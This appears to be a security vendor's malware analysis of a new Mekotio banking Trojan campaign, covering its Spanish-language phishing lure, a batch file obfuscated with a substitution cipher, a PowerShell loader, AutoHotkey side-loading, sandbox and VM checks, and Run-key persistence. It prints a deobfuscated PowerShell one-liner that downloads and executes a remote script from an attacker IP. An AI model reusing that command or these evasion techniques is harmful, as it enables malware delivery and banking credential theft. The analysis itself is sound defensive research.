Mekotio, a modular banking Trojan that targeted Latin American countries, recently made a comeback with a new infection flow. The new campaign started right after the Spanish Civil Guard announced the arrest of 16 people involved with Mekotio distribution in July 2021. It appears that the gang behind the malware were able to narrow the gap quickly and change tactics to avoid detection.
We assume that the main cybercrime groups are operating from Brazil and they collaborated with Spanish gangs to distribute malwares. The arrest stopped the activity of the Spanish gangs but not the main cybercrime groups.
Mekotio’s new infection vector contains these unprecedented elements:
In the last 3 months, we saw approximately 100 attacks use new, simple obfuscation techniques, with the help of a substitution cipher, to hide the first module of the attack. This simple obfuscation technique allows it to go undetected by most of the AntiVirus products.
Figure 1 – Low detection rate of Mekotio batch file on VirusTotal
During July and August, Check Point Threat Prevention Engine detected and blocked a wave of malicious batch files with unique obfuscation patterns. When we looked into it, we saw the following attack flow:
Figure 2 – Mekotio new attack flow
6. Those 3 files are extracted and saved in a new directory on the infected system.
7. The PowerShell script calls the AutoHotkey interpreter to run the AHK script.
8. The AutoHotkey script runs the DLL payload.
9. The DLL contains the main Mekotio banker functionality for actions such as stealing access credentials for electronic banking portals and a password stealer.
10. The stolen data is sent to the C&C server.
Let’s now take a closer look at the malware components.
The phishing email, which is written in Spanish, claims that there is a digital tax receipt pending submission. When the victims click the link in the email, a malicious zip archive is downloaded from a malicious website.
Figure 3 – Phishing email
The batch file extracted from the first zip archive has two layers of obfuscation and often contains a file name which starts with “Contacto”.
Figure 4 – Snippet of the obfuscated batch script
The first layer of the obfuscation is a simple substitution cipher. Substitution ciphers encrypt plaintext by replacing each symbol in the plaintext with the corresponding symbol from the lookup table. The source code of this obfuscation was probably taken from here.
Each batch file contains these two lines:
Figure 5 – Substitution arrays
These lines define the substitution and we can use them to deobfuscate the first layer.
After deobfuscating the first layer, we get another layer of obfuscation:
Figure 6 – Layer 2 of obfuscation
In this layer, slices of the command are saved in different environment variables. The values in lines 4-13 are concatenated, resulting the following command:
powershell.exe -ep bypass -nop -win 1
There is also a PowerShell command saved in the environment variable in the example called “mEeWtg9Pxm” (line 18), which is produced as a result of concatenating letters from the environment variable in the example called “o7cro6vX” (line 3).
The output of executing the lines 3 and 18 is the following PowerShell command:
Putting everything together, the batch file executes the following command:
echo iex(“IEX(New-Object Net.WebClient).DownloadString(‘http://13[.]66.15.167/m/?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT’)”); | powershell.exe -ep bypass -nop -win 1
After executing the command, a PowerShell script is downloaded to the memory and is executed.
The first thing the script does is check the location of the infected system using the ipinfo.io service. If the system is not in one of these countries, (Brazil, Chile, Mexico, Spain and Peru), then the attack is terminated.
Figure 7 – Checking the location of the infected system
Next, the script checks if it is running in a virtual machine: it compares the computer model to the strings ‘VMware Virtual Platform’ and ‘Virtual Machine’, and exits if the computer model is one of the above.
Figure 8 – Checking if the computer is a virtual machine
The next thing the script does is to create an empty file, used as a footprint, whose name is the current date. This lets it know if it already ran in the system. If the file already exists, the script stops the execution.
Figure 9 – Footprint file creation
After checking the footprint file, a directory with a random name whose length is 8 is usually created in the ProgramData Directory.
Figure 10 – Creating a new directory
Next, a secondary zip file with a random file name is downloaded to the directory.
Figure 11 – Downloading the zip file
The downloaded zip archive contains three files: Mekotio payload DLL, AutoHotkey interpreter and AutoHotkey script. After downloading the zip archive, the script extracts and renames each file in the zip archive with a random name and saves it in the created directory.
The script checks the size of the extracted files to distinguish between the type and the purpose of the files. The script renames the files, adding the extension according to the detected file type.
Figure 12 – Renaming files from the downloaded zip
After renaming the extracted files, a shortcut to the AutoHotkey is created in the AppData directory. The arguments to the shortcut are the AutoHotkey script and the Mekotio DLL.
An AutoHotkey process is started using the shortcut.
Figure 13 – Creating the shortcut and starting AutoHotkey process
Finally, persistence is gained by adding a new value to the following registry key: “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”
This runs the AutoHotkey with the AHK script and the Mekotio DLL as arguments.
Figure 14 – Adding a new value to the registry
The AHK script uses DllCall to run the 4th exported DLL function. By executing the AutoHotkey script, the DLL looks like part of the AutoHotkey execution. As final payloads, we see the DLL which contains the well-known and well-covered Mekotio Banker.
Banking Trojans are a common malware used in attacks targeting countries in Latin America.
One of the characteristics of those bankers, such as Mekotio, is the modular attack which gives the attackers the ability to change only a small part of the whole in order to avoid detection.
CPR see a lot of old malicious code used for a long time, and yet the attacks manage to stay under the radar of AVs and EDR solutions by changing packers or obfuscation techniques such as a substitution cipher.
Our analysis of this campaign highlights the efforts that attackers make to conceal their malicious intentions, bypass security filtering and trick users. To protect yourself against this type of attack, be suspicious of any email or communication from a familiar brand or organization that asks you to click on a link or open an attached document.
Here are some practical tips to help keep your data safe:
Organizations can prevent zero-day attacks with an end-to-end cyber architecture used to block deceptive phishing sites and provide alerts on password reuse in real time. Check Point Infinity is effective because it combines two key ingredients: full convergence across all attack surfaces and all attack vectors, and advanced prevention that can tackle the most sophisticated zero-day phishing and account takeover attacks.
Check Point Threat Emulation provides protection against this threat:
Indicators of Compromise
Links to first zip